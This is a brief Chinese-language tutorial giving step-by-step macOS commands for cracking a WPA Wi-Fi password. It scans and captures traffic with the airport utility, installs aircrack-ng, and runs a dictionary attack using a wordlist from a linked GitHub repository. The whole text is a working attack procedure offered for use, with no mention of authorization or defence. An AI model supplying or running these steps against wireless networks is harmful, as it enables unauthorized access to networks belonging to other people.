1、查看网卡名称
在终端输入命令ifconfig查看
2、使用airport监听无线网络
1 | airport en1 scan |
3、使用airport进行抓包
1 | airport en1 sniff 1 # 1省略代表抓取全部 |
4、安装aircrack-ng
1 | brew install aircrack-ng |
5、使用aircrack-ng执行破解,字典资源:https://github.com/conwnet/wpa-dictionary
1 | aircrack-ng -w common.txt /tmp/airportSniff0RjCAO.cap |